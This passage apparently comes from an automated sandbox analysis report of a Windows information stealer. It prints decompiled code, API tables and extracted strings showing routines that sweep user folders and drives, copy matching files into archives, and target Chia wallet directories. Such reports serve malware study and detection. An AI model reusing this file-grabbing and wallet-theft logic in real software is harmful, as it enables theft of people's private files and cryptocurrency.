				_t235 =  ~( ~_t154);
				if(_t184 == 0) {
					_t241 = _v3208;
					E0040C320(_t184,  &_v1120, _v3216, _t235, __eflags, _v3216,  &_v1120, _t241, _a20, _a8, _v3212, 0, _t235, 0, _a32); // executed
					_t257 = _t257 + 0x28;
				} else {
					GetLogicalDriveStringsA(0x64,  &_v120);
					_t243 =  &_v120;
					if(_v120 != 0) {
						do {
							_t166 = GetDriveTypeA(_t243);
							if(_v3220 == 0) {
								L17:
								 *0x46490c( &_v2120,  &_v1120);
								_t169 = E00420440( &_v2120, "%DRIVE_FIXED%", _t243);
								_t260 = _t257 + 0xc;
								_push(_t169);
								_push( &_v2120);
							} else {
								_t271 = _t166 - 2;
								if(_t166 != 2) {
									goto L17;
								} else {
									 *0x46490c( &_v2120,  &_v1120);
									_t177 = E00420440( &_v2120, "%DRIVE_REMOVABLE%", _t243);
									_t260 = _t257 + 0xc;
									_push(_t177);
									_push( &_v2120);
								}
							}
							 *0x46490c();
							E0040C320(_t184,  &_v2120, _v3216, _t235, _t271, _v3216,  &_v2120, _v3208, _a20, _a8, _v3212, _t184, _t235, 0, _a32);
							_t257 = _t260 + 0x28;
							_t174 =  *0x464758(_t243);
							_t272 = _t243[_t174 + 1];
							_t243 =  &(_t243[_t174 + 1]);
						} while (_t272 != 0);
					}
					_t241 = _v3208;
				}
				E00429670(_t241,  &_v3232,  &_v3228);
				_t223 = _v3224;
				E00429620(_v3224,  &_v3120, _v3232, _v3228);
				_t162 = E00407590(_t241);
				_push(_t241);
				if(_t162 == 0) {
					_t163 = E00429700();
				} else {
					_t163 = E00409920( &_v3120);
				}
				 *[fs:0x0] = _v16;
				_pop(_t236);
				_pop(_t242);
				_pop(_t185);
				return E0042A36A(_t163, _t185, _v20 ^ _t244, _t223, _t236, _t242);
			}

0x0040d1d7
0x0040d1dc
0x0040d1de
0x0040d1e8
0x0040d1fa
0x0040d202
0x0040d211
0x0040d217
0x0040d21d
0x0040d230
0x0040d243
0x0040d257
0x0040d265
0x0040d277
0x0040d286
0x0040d28b
0x0040d28f
0x0040d295
0x0040d2b7
0x0040d2e1
0x0040d30b
0x0040d311
0x0040d318
0x0040d323
0x0040d329
0x0040d33f
0x0040d357
0x0040d35a
0x0040d36c
0x0040d370
0x0040d375
0x0040d37d
0x0040d384
0x0040d386
0x0040d386
0x0040d395
0x0040d39a
0x0040d3a5
0x0040d3b1
0x0040d3b9
0x0040d3ba
0x0040d3bf
0x0040d3bf
0x0040d3c2
0x0040d3cc
0x0040d3d6
0x0040d3e3
0x0040d3eb
0x0040d3ec
0x0040d3f1
0x0040d3f1
0x0040d3f4
0x0040d3fe
0x0040d408
0x0040d40f
0x0040d41c
0x0040d424
0x0040d425
0x0040d42a
0x0040d42a
0x0040d42f
0x0040d439
0x0040d443
0x0040d44a
0x0040d46c
0x0040d474
0x0040d496
0x0040d49e
0x0040d4c0
0x0040d4c8
0x0040d4da
0x0040d4df
0x0040d4ea
0x0040d4f0
0x0040d4f2
0x0040d4fd
0x0040d506
0x0040d508
0x0040d508
0x0040d50d
0x0040d50f
0x0040d51a
0x0040d523
0x0040d525
0x0040d52a
0x0040d52a
0x0040d538
0x0040d542
0x0040d544
0x0040d548
0x0040d68c
0x0040d6ad
0x0040d6b2
0x0040d54e
0x0040d554
0x0040d55e
0x0040d561
0x0040d567
0x0040d568
0x0040d575
0x0040d5af
0x0040d5bd
0x0040d5d0
0x0040d5d5
0x0040d5d8
0x0040d5df
0x0040d577
0x0040d577
0x0040d57a
0x00000000
0x0040d57c
0x0040d58a
0x0040d59d
0x0040d5a2
0x0040d5a5
0x0040d5ac
0x0040d5ac
0x0040d57a
0x0040d5e0
0x0040d612
0x0040d617
0x0040d61b
0x0040d621
0x0040d626
0x0040d626
0x0040d567
0x0040d630
0x0040d630
0x0040d645
0x0040d657
0x0040d666
0x0040d66c
0x0040d674
0x0040d677
0x0040d6ba
0x0040d679
0x0040d679
0x0040d679
0x0040d6c5
0x0040d6cd
0x0040d6ce
0x0040d6cf
0x0040d6dd

APIs

_memset.LIBCMT ref: 0040D21D
_memset.LIBCMT ref: 0040D230
_memset.LIBCMT ref: 0040D243
lstrcat.KERNEL32(?,\Files\), ref: 0040D257
lstrcat.KERNEL32(?,?), ref: 0040D265
lstrcat.KERNEL32(?,.zip), ref: 0040D277

Part of subcall function 00420650: _memset.LIBCMT ref: 00420671
Part of subcall function 00420650: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 0042068A

Part of subcall function 00420440: StrStrA.SHLWAPI(000F4240,00000000,?,00000000,?,0040D2AC,?,%APPDATA%,00000000,0000001A,00000000,000F4240,00000000), ref: 0042044D

lstrcpy.KERNEL32(?,00000000), ref: 0040D2B7

Part of subcall function 00420440: lstrcpyn.KERNEL32(00463E80,000F4240,00000000,?,?,0040D2AC,?,%APPDATA%,00000000,0000001A,00000000,000F4240,00000000), ref: 0042046B
Part of subcall function 00420440: _strlen.LIBCMT ref: 0042047E
Part of subcall function 00420440: wsprintfA.USER32 ref: 00420490

lstrcpy.KERNEL32(?,00000000), ref: 0040D2E1
lstrcpy.KERNEL32(?,00000000), ref: 0040D30B

Part of subcall function 0041EDD0: GetUserNameA.ADVAPI32(?,?), ref: 0041EDFB

_strlen.LIBCMT ref: 0040D32F

Part of subcall function 00404DB0: _strlen.LIBCMT ref: 00404DC0

Part of subcall function 0040D0B0: _strlen.LIBCMT ref: 0040D0C0

lstrcpy.KERNEL32(?,00000000), ref: 0040D3A5
lstrcpy.KERNEL32(?,00000000), ref: 0040D46C
lstrcpy.KERNEL32(?,00000000), ref: 0040D496
lstrcpy.KERNEL32(?,00000000), ref: 0040D4C0
lstrcpy.KERNEL32(?,00000000), ref: 0040D4EA
GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 0040D554
GetDriveTypeA.KERNEL32(00000000), ref: 0040D568
lstrcpy.KERNEL32(?,?), ref: 0040D58A
lstrcpy.KERNEL32(?,?), ref: 0040D5BD

Part of subcall function 0040C320: _strtok_s.LIBCMT ref: 0040C331
Part of subcall function 0040C320: _strtok_s.LIBCMT ref: 0040C383

lstrcpy.KERNEL32(?,00000000), ref: 0040D5E0
lstrlen.KERNEL32(00000000), ref: 0040D61B

Strings

%LOCALAPPDATA%, xrefs: 0040D2CB
*%DRIVE_FIXED%*, xrefs: 0040D4F2
%APPDATA%, xrefs: 0040D2A1
*%DRIVE_REMOVABLE%*, xrefs: 0040D50F
%DRIVE_FIXED%, xrefs: 0040D5CA
%USERPROFILE%, xrefs: 0040D2F5
%DESKTOP%, xrefs: 0040D38F
%RECENT%, xrefs: 0040D4D4
%PROGRAMFILES%, xrefs: 0040D480
%DOCUMENTS%, xrefs: 0040D456
%DRIVE_REMOVABLE%, xrefs: 0040D597
\Desktop\, xrefs: 0040D35F
.zip, xrefs: 0040D26B
C:\Users\, xrefs: 0040D351
%PROGRAMFILES_86%, xrefs: 0040D4AA
\Files\, xrefs: 0040D24B
*%RECENT%*, xrefs: 0040D532

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: lstrcpy$_memset_strlen$lstrcat$Drive_strtok_s$FolderLogicalNamePathStringsTypeUserlstrcpynlstrlenwsprintf
String ID: %APPDATA%$%DESKTOP%$%DOCUMENTS%$%DRIVE_FIXED%$%DRIVE_REMOVABLE%$%LOCALAPPDATA%$%PROGRAMFILES%$%PROGRAMFILES_86%$%RECENT%$%USERPROFILE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*$*%RECENT%*$.zip$C:\Users\$\Desktop\$\Files\
API String ID: 3654090531-1865006654
Opcode ID: 0525b37cb809c2287a2dcc9328a41e82d7f4db765503f649660259d3acf28284
Instruction ID: ab081f155fddf84030944b804c2151b550d4984f996d67ddf8d9bf3ae2086208
Opcode Fuzzy Hash: 0525b37cb809c2287a2dcc9328a41e82d7f4db765503f649660259d3acf28284
Instruction Fuzzy Hash: C5D1ACB1900218ABEB14EBA0DC85FDF7778AF44704F5086DAF50972182DF796A48CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00410940 Relevance: 57.3, APIs: 1, Strings: 31, Instructions: 1273
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00410940() {
				signed int _v8;
				char _v2008;
				signed int _t4;
				signed int _t5;
				void* _t20;
				void* _t22;
				void* _t23;
				signed int _t24;
				signed int _t27;

				_t4 =  *0x451f00; // 0xc21d6f0a
				_t5 = _t4 ^ _t24;
				_t27 = _t5;
				_v8 = _t5;
				E0042A2F0( &_v2008, 0, 0x7d0);
				if(_t27 != 0 && _t27 == 0) {
				}
				E004011A0(); // executed
				if(_t27 != 0 && _t27 == 0) {
				}
				E00401130(_t20, _t22, _t23); // executed
				if(_t27 != 0 && _t27 == 0) {
				}
				E004010F0();
				if(_t27 != 0 && _t27 == 0) {
				}
				E00401130(_t20, _t22, _t23); // executed
				if(_t27 != 0 && _t27 == 0) {
				}
				E004010F0();
				if(_t27 != 0 && _t27 == 0) {
				}
				E00401130(_t20, _t22, _t23);
				_push("The");
			}

0x00410949
0x0041094e
0x0041094e
0x00410950
0x00410961
0x00410969
0x00410969
0x0041096e
0x00410973
0x00410973
0x00410978
0x0041097d
0x0041097d
0x00410982
0x00410987
0x00410987
0x0041098c
0x00410991
0x00410991
0x00410996
0x0041099b
0x0041099b
0x004109a0
0x004109ab

APIs

_memset.LIBCMT ref: 00410961

Strings

The, xrefs: 004109AB
Williams, xrefs: 00410A7A
Strigamia, xrefs: 00410C34, 00410D6E, 00410EA8, 00410FE2, 00411176, 004112A6, 004113D6, 00411506, 00411636, 00411766
Congregationalist, xrefs: 00410B60
Llanelli, xrefs: 00410BB8
William, xrefs: 00410A69
order, xrefs: 00410D03, 00410E37, 00410F77, 004110B1, 00411245, 00411375, 004114A5, 004115D5, 00411705, 00411835
the, xrefs: 00410CA5, 00410CF2, 00410DE5, 00410E2C, 00410F1F, 00410F66, 00411059, 004110A0, 004111ED, 00411234, 0041131D, 00411364, 0041144D, 00411494, 0041157D, 004115C4, 004116AD, 004116F4, 004117DD, 00411824
Linotaeniidae, xrefs: 00410CD0, 00410E0A, 00410F44, 0041107E, 00411212, 00411342, 00411472, 004115A2, 004116D2, 00411802
family, xrefs: 00410CBF, 00410DF9, 00410F33, 0041106D, 00411201, 00411331, 00411461, 00411591, 004116C1, 004117F1
(Llangollen), xrefs: 004109CD
Independent, xrefs: 00410B4F
first, xrefs: 00410A36
was, xrefs: 004109DE, 00410B2D
Welsh-language, xrefs: 00410A11
Inkerman, xrefs: 00410B93
centipede, xrefs: 00410C78, 00410DB2, 00410EEC, 00411026, 004111BA, 004112EA, 0041141A, 0041154A, 0041167A, 004117AA
Ebenezer, xrefs: 00410B1C
Wales, xrefs: 00410BDA
19th-century, xrefs: 00410A00
Carmarthenshire, xrefs: 00410BC9
Geophilomorpha, xrefs: 00410D14, 00410E4E, 00410F88, 004110C2, 00411256, 00411386, 004114B6, 004115E6, 00411716, 00411846
crassipes, xrefs: 00410C45, 00410D7F, 00410EB9, 00410FF3, 00411187, 004112B7, 004113E7, 00411517, 00411647, 00411777
Greal, xrefs: 004109BC
1852, xrefs: 00410AC1
periodical, xrefs: 00410A22
published, xrefs: 00410A47
chapel, xrefs: 00410B71
belonging, xrefs: 00410C89, 00410DC3, 00410EFD, 00411037, 004111CB, 004112FB, 0041142B, 00411555, 0041168B, 004117BB
Street, xrefs: 00410BA7
Llangollen, xrefs: 00410A9C

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: _memset
String ID: (Llangollen)$1852$19th-century$Carmarthenshire$Congregationalist$Ebenezer$Geophilomorpha$Greal$Independent$Inkerman$Linotaeniidae$Llanelli$Llangollen$Street$Strigamia$The$Wales$Welsh-language$William$Williams$belonging$centipede$chapel$crassipes$family$first$order$periodical$published$the$was
API String ID: 2102423945-368131496
Opcode ID: 8cb095a4f4fe21b131e64144ee4bcbfd33b7c61137fbe0560a54a07af1fc572d
Instruction ID: b00e9e2748271f5d4d2f051e0bdcc8e72b7b302dcddd81a06b97b75c471c2bf3
Opcode Fuzzy Hash: 8cb095a4f4fe21b131e64144ee4bcbfd33b7c61137fbe0560a54a07af1fc572d
Instruction Fuzzy Hash: 06A2A471D606146BDF20F7A5C886EE9B378EF54704FE0098BB1047666797BCAA804F6C

Uniqueness

Uniqueness Score: -1.00%

Function 004118B0 Relevance: 50.9, APIs: 26, Strings: 3, Instructions: 195stringfileCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004118EC

Part of subcall function 00420650: _memset.LIBCMT ref: 00420671
Part of subcall function 00420650: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 0042068A

lstrcat.KERNEL32(?,00000000), ref: 00411903
wsprintfA.USER32 ref: 00411924
wsprintfA.USER32 ref: 0041193E
FindFirstFileA.KERNEL32(?,?), ref: 00411955
StrCmpCA.SHLWAPI(?,004456B0), ref: 0041197C
StrCmpCA.SHLWAPI(?,004456AC), ref: 00411996
wsprintfA.USER32 ref: 004119CA
wsprintfA.USER32 ref: 004119E4
_memset.LIBCMT ref: 00411A15
lstrcat.KERNEL32(?,00443C68), ref: 00411A29
lstrcat.KERNEL32(?,00445C08), ref: 00411A3B
lstrcat.KERNEL32(?,00445A68), ref: 00411A4D
lstrcat.KERNEL32(?,00445A6C), ref: 00411A5F
lstrcat.KERNEL32(?,00445A6C), ref: 00411A71
lstrcat.KERNEL32(?,00445A78), ref: 00411A83
lstrcat.KERNEL32(?,00445A84), ref: 00411A95
lstrcat.KERNEL32(?,00445A44), ref: 00411AA7
lstrcat.KERNEL32(?,00443C68), ref: 00411AB9
lstrcat.KERNEL32(?,00000000), ref: 00411AC7
lstrcat.KERNEL32(?,00443C68), ref: 00411AD9
lstrcat.KERNEL32(?,?), ref: 00411AF1
lstrcat.KERNEL32(?,00443C68), ref: 00411B03
lstrcat.KERNEL32(?,?), ref: 00411B27
FindNextFileA.KERNEL32(?,?), ref: 00411B58
FindClose.KERNEL32(?), ref: 00411B6D

Strings

%s\%s\*, xrefs: 0041191E
%s\%s\%s\%s, xrefs: 004119C4
%s\%s\%s, xrefs: 00411938, 004119DE

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: lstrcat$wsprintf$Find_memset$File$CloseFirstFolderNextPath
String ID: %s\%s\%s$%s\%s\%s\%s$%s\%s\*
API String ID: 694348087-1660153875
Opcode ID: 00f6e41c50cb359cab8fbcfb18651576d0ddb9f1a165c0864d6eb000e610a119
Instruction ID: 039e5151d5ed5f6f0ea7569818a1f9175ebe269b9267c9c4db7e60088ede4e20
Opcode Fuzzy Hash: 00f6e41c50cb359cab8fbcfb18651576d0ddb9f1a165c0864d6eb000e610a119
Instruction Fuzzy Hash: D371C57690071CABCF50EBA0DC85EEB7378BB89701F004599F20593051EBB49AC4CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00416500 Relevance: 42.2, APIs: 21, Strings: 3, Instructions: 166
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00416500(void* __ecx, intOrPtr _a4, intOrPtr _a8, char* _a12, intOrPtr _a16) {
				signed int _v8;
				char _v268;
				char _v528;
				char _v788;
				char _v1048;
				char _v2048;
				struct _WIN32_FIND_DATAA _v2368;
				void* _v2369;
				intOrPtr _v2376;
				void* _v2380;
				char* _v2384;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t46;
				int _t51;
				int _t64;
				intOrPtr _t75;
				intOrPtr _t85;
				intOrPtr _t115;
				void* _t116;
				signed int _t117;
				void* _t118;
				void* _t119;
				void* _t120;

				_t46 =  *0x451f00; // 0xc21d6f0a
				_v8 = _t46 ^ _t117;
				_t85 = _a8;
				_t115 = _a16;
				_t116 = __ecx;
				_t104 =  &_v1048;
				_v2376 = _a4;
				_v2384 = _a12;
				wsprintfA( &_v1048, "%s\\*", _t85);
				_t119 = _t118 + 0xc;
				_t51 = FindFirstFileA( &_v1048,  &_v2368); // executed
				_v2380 = _t51;
				if(_t51 == 0xffffffff) {
					L12:
					return E0042A36A(_t51, _t85, _v8 ^ _t117, _t104, _t115, _t116);
				}
				do {
					_push(".");
					_push( &(_v2368.cFileName));
					if( *0x464890() != 0) {
						_push("..");
						_push( &(_v2368.cFileName));
						if( *0x464890() != 0) {
							wsprintfA( &_v788, "%s\\%s", _t85,  &(_v2368.cFileName));
							_t120 = _t119 + 0x10;
							_push(0x443c1c);
							_push(_v2376);
							if( *0x464890() != 0) {
								wsprintfA( &_v528, "%s\\%s", _v2376,  &(_v2368.cFileName));
								_t119 = _t120 + 0x10;
							} else {
								wsprintfA( &_v528, "%s",  &(_v2368.cFileName));
								_t119 = _t120 + 0xc;
							}
							_t64 = PathMatchSpecA( &(_v2368.cFileName), _v2384);
							_t127 = _t64;
							if(_t64 != 0) {
								E0042A2F0( &_v2048, 0, 0x3e8);
								 *0x464860( &_v2048, "\\Soft\\");
								 *0x464860( &_v2048, _t115);
								 *0x464860( &_v2048, "\\");
								 *0x464860( &_v2048,  &_v528);
								E0042A2F0( &_v268, 0, 0x104);
								_t75 =  *0x453978; // 0x25c13d0
								 *0x464860( &_v268, _t75);
								 *0x464860( &_v268, E00420520(_t115, _t127, 0x1a));
								CopyFileA( &_v788,  &_v268, 1);
								E004295D0( *((intOrPtr*)(_t116 + 0x20)),  &_v2048,  &_v268);
								_t119 = _t119 + 0x24;
								DeleteFileA( &_v268);
							}
							E00416500(_t116,  &_v528,  &_v788, _v2384, _t115);
						}
					}
				} while (FindNextFileA(_v2380,  &_v2368) != 0);
				_t104 = _v2380;
				_t51 = FindClose(_v2380);
				goto L12;
			}

0x00416509
0x00416510
0x00416517
0x0041651c
0x00416520
0x00416525
0x00416531
0x00416537
0x0041653d
0x00416543
0x00416554
0x0041655a
0x00416563
0x00416751
0x00416761
0x00416761
0x00416570
0x00416570
0x0041657b
0x00416584
0x0041658a
0x00416595
0x0041659e
0x004165b8
0x004165c4
0x004165c7
0x004165cc
0x004165db
0x00416609
0x0041660f
0x004165dd
0x004165ea
0x004165f0
0x004165f0
0x00416620
0x00416626
0x00416628
0x0041663c
0x00416650
0x0041665e
0x00416670
0x00416684
0x00416698
0x0041669d
0x004166ad
0x004166c8
0x004166de
0x004166f6
0x004166fb
0x00416705
0x00416705
0x00416723
0x00416723
0x0041659e
0x0041673c
0x00416744
0x0041674b
0x00000000

APIs

wsprintfA.USER32 ref: 0041653D
FindFirstFileA.KERNEL32(?,?), ref: 00416554
StrCmpCA.SHLWAPI(?,004456B0), ref: 0041657C
StrCmpCA.SHLWAPI(?,004456AC), ref: 00416596
wsprintfA.USER32 ref: 004165B8
StrCmpCA.SHLWAPI(?,00443C1C), ref: 004165CD
wsprintfA.USER32 ref: 004165EA
wsprintfA.USER32 ref: 00416609
PathMatchSpecA.SHLWAPI(?,?), ref: 00416620
_memset.LIBCMT ref: 0041663C
lstrcat.KERNEL32(?,\Soft\), ref: 00416650
lstrcat.KERNEL32(?,?), ref: 0041665E
lstrcat.KERNEL32(?,00443C68), ref: 00416670
lstrcat.KERNEL32(?,?), ref: 00416684
_memset.LIBCMT ref: 00416698
lstrcat.KERNEL32(?,025C13D0), ref: 004166AD
lstrcat.KERNEL32(?,00000000), ref: 004166C8
CopyFileA.KERNEL32(?,?,00000001), ref: 004166DE
DeleteFileA.KERNEL32(?), ref: 00416705
FindNextFileA.KERNEL32(?,?), ref: 00416736
FindClose.KERNEL32(?), ref: 0041674B

Strings

%s\%s, xrefs: 004165B2, 00416603
%s\*, xrefs: 0041652B
\Soft\, xrefs: 00416644

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$_memset$CloseCopyDeleteFirstMatchNextPathSpec
String ID: %s\%s$%s\*$\Soft\
API String ID: 827446654-1410843534
Opcode ID: c4e97208eddcb662614f68183fb316d0fdf2d0691b5ad2cd6e080c29eabb4b29
Instruction ID: 5e2d3e3ce32f3c45d9d7f4aa3a397f85710d7323f15c273f3b362a48902d8144
Opcode Fuzzy Hash: c4e97208eddcb662614f68183fb316d0fdf2d0691b5ad2cd6e080c29eabb4b29
Instruction Fuzzy Hash: B95165B5A0121DABDB24EF60DC85FEA7378FB85701F004999F50992141EBB4AB84CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00411DD0 Relevance: 40.4, APIs: 20, Strings: 3, Instructions: 172
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E00411DD0(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char* _a16) {
				signed int _v8;
				char _v268;
				char _v528;
				char _v788;
				char _v1048;
				char _v1308;
				struct _WIN32_FIND_DATAA _v1628;
				char* _v1632;
				void* _v1636;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t47;
				int _t53;
				intOrPtr _t86;
				intOrPtr _t108;
				intOrPtr _t113;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t120;

				_t47 =  *0x451f00; // 0xc21d6f0a
				_v8 = _t47 ^ _t114;
				_t86 = _a8;
				_t113 = _a12;
				_t112 = _a4;
				_v1632 = _a16;
				wsprintfA( &_v1048, "%s\\%s\\*", E00420650(_t86, _a4, _t113, 0x28), _t113);
				_t117 = _t115 + 0x14;
				_t101 =  &_v1628;
				_t53 = FindFirstFileA( &_v1048,  &_v1628); // executed
				_v1636 = _t53;
				if(_t53 == 0xffffffff) {
					L13:
					return E0042A36A(_t53, _t86, _v8 ^ _t114, _t101, _t112, _t113);
				} else {
					do {
						_push(".");
						_push( &(_v1628.cFileName));
						if( *0x464890() != 0) {
							_push("..");
							_push( &(_v1628.cFileName));
							if( *0x464890() != 0) {
								wsprintfA( &_v788, "%s\\%s", _t113,  &(_v1628.cFileName));
								wsprintfA( &_v1308, "%s\\%s", E00420650(_t86, _t112, _t113, 0x28),  &_v788);
								_t120 = _t117 + 0x24;
								_push(0x443c1c);
								_push(_t86);
								if( *0x464890() != 0) {
									_push( &(_v1628.cFileName));
									_push(_t86);
									_push("%s\\%s");
									_push( &_v528);
								} else {
									_push( &(_v1628.cFileName));
									_push(_t113);
									_push("\\Wallets\\Chia Wallet\\%s\\%s");
									_push( &_v528);
								}
								wsprintfA();
								_t117 = _t120 + 0x10;
								if(PathMatchSpecA( &_v788, _v1632) != 0) {
									E0042A2F0( &_v268, 0, 0x104);
									_t108 =  *0x453978; // 0x25c13d0
									 *0x464860( &_v268, _t108);
									 *0x464860( &_v268,  &(_v1628.cFileName));
									CopyFileA( &_v1308,  &_v268, 1);
									E004295D0(_t112,  &_v528,  &_v268);
									_t117 = _t117 + 0x18;
									DeleteFileA( &_v268);
								}
								_t129 = _v1628.dwFileAttributes & 0x00000010;
								if((_v1628.dwFileAttributes & 0x00000010) != 0) {
									E0042A2F0( &_v268, 0, 0x104);
									 *0x464860( &_v268, _t113);
									 *0x464860( &_v268, "\\");
									 *0x464860( &_v268,  &(_v1628.cFileName));
									E00411DD0(_t129, _t112,  &_v528,  &_v268, _v1632);
									_t117 = _t117 + 0x1c;
								}
							}
						}
						_t101 = _v1636;
					} while (FindNextFileA(_v1636,  &_v1628) != 0);
					_t53 = FindClose(_v1636);
					goto L13;
				}
			}

0x00411dd9
0x00411de0
0x00411de7
0x00411deb
0x00411def
0x00411df5
0x00411e10
0x00411e16
0x00411e19
0x00411e27
0x00411e2d
0x00411e36
0x00412025
0x00412035
0x00411e40
0x00411e40
0x00411e40
0x00411e4b
0x00411e54
0x00411e5a
0x00411e65
0x00411e6e
0x00411e88
0x00411eaf
0x00411eb5
0x00411eb8
0x00411ebd
0x00411ec6
0x00411ee4
0x00411ee5
0x00411ee6
0x00411ef1
0x00411ec8
0x00411ece
0x00411ecf
0x00411ed0
0x00411edb
0x00411edb
0x00411ef2
0x00411efe
0x00411f11
0x00411f21
0x00411f26
0x00411f37
0x00411f4b
0x00411f61
0x00411f76
0x00411f7b
0x00411f85
0x00411f85
0x00411f8b
0x00411f92
0x00411fa2
0x00411fb2
0x00411fc4
0x00411fd8
0x00411ff4
0x00411ff9
0x00411ff9
0x00411f92
0x00411e6e
0x00411ffc
0x00412010
0x0041201f
0x00000000
0x0041201f

APIs

Part of subcall function 00420650: _memset.LIBCMT ref: 00420671
Part of subcall function 00420650: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 0042068A

wsprintfA.USER32 ref: 00411E10
FindFirstFileA.KERNEL32(?,?), ref: 00411E27
StrCmpCA.SHLWAPI(?,004456B0), ref: 00411E4C
StrCmpCA.SHLWAPI(?,004456AC), ref: 00411E66
wsprintfA.USER32 ref: 00411E88
wsprintfA.USER32 ref: 00411EAF
StrCmpCA.SHLWAPI(?,00443C1C), ref: 00411EBE
wsprintfA.USER32 ref: 00411EF2
PathMatchSpecA.SHLWAPI(?,?), ref: 00411F09
_memset.LIBCMT ref: 00411F21
lstrcat.KERNEL32(?,025C13D0), ref: 00411F37
lstrcat.KERNEL32(?,?), ref: 00411F4B
CopyFileA.KERNEL32(?,?,00000001), ref: 00411F61
DeleteFileA.KERNEL32(?), ref: 00411F85
_memset.LIBCMT ref: 00411FA2
lstrcat.KERNEL32(?,025CA330), ref: 00411FB2
lstrcat.KERNEL32(?,00443C68), ref: 00411FC4
lstrcat.KERNEL32(?,?), ref: 00411FD8
FindNextFileA.KERNEL32(?,?), ref: 0041200A
FindClose.KERNEL32(?), ref: 0041201F

Strings

\Wallets\Chia Wallet\%s\%s, xrefs: 00411ED0
%s\%s\*, xrefs: 00411E0A
%s\%s, xrefs: 00411E82, 00411EA9, 00411EE6

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find_memset$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: %s\%s$%s\%s\*$\Wallets\Chia Wallet\%s\%s
API String ID: 2153862992-4262826821
Opcode ID: 4f24122d383b954c3850011cfc509eed4957050cca73dc85ce7b8a7ec3c4526c
Instruction ID: 4f0395bda300ead6f762823a3de39b5780c432efb2ba341837dce3dfda242089
Opcode Fuzzy Hash: 4f24122d383b954c3850011cfc509eed4957050cca73dc85ce7b8a7ec3c4526c
Instruction Fuzzy Hash: 9F51A4B6900218ABDF10EBA0DC45FEB777CEB99701F004599F609A2041EBB59B94CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00411B90 Relevance: 40.4, APIs: 20, Strings: 3, Instructions: 149
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E00411B90(void* __ebx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16) {
				signed int _v8;
				char _v268;
				char _v528;
				char _v788;
				char _v1048;
				struct _WIN32_FIND_DATAA _v1368;
				void* _v1372;
				intOrPtr _v1376;
				intOrPtr _v1380;
				void* __edi;
				void* __esi;
				signed int _t43;
				void* _t46;
				int _t49;
				intOrPtr _t104;
				signed int _t105;
				void* _t106;
				void* _t108;

				_t80 = __ebx;
				_t43 =  *0x451f00; // 0xc21d6f0a
				_v8 = _t43 ^ _t105;
				_t104 = _a4;
				_t5 =  &_a16; // 0x413e60
				_t103 =  *_t5;
				_v1380 = _a8;
				_v1376 = _a12;
				_t46 = E00420650(__ebx,  *_t5, _t104, 0x1a);
				_t94 =  &_v788;
				wsprintfA( &_v788, "%s\\%s\\*", _t46, _t104);
				_t108 = _t106 + 0x14;
				_t49 = FindFirstFileA( &_v788,  &_v1368); // executed
				_v1372 = _t49;
				if(_t49 == 0xffffffff) {
					L7:
					return E0042A36A(_t49, _t80, _v8 ^ _t105, _t94, _t103, _t104);
				} else {
					goto L1;
				}
				do {
					L1:
					_push(".");
					_push( &(_v1368.cFileName));
					if( *0x464890() != 0) {
						_push("..");
						_push( &(_v1368.cFileName));
						if( *0x464890() != 0) {
							wsprintfA( &_v528, "%s\\%s", _t104,  &(_v1368.cFileName));
							wsprintfA( &_v1048, "%s\\%s", E00420650(_t80, _t103, _t104, 0x1a),  &_v528);
							E0042A2F0( &_v268, 0, 0x104);
							 *0x464860( &_v268, "\\");
							 *0x464860( &_v268, "W");
							 *0x464860( &_v268, "a");
							 *0x464860( &_v268, "l");
							 *0x464860( &_v268, "l");
							 *0x464860( &_v268, "e");
							 *0x464860( &_v268, "t");
							 *0x464860( &_v268, "s");
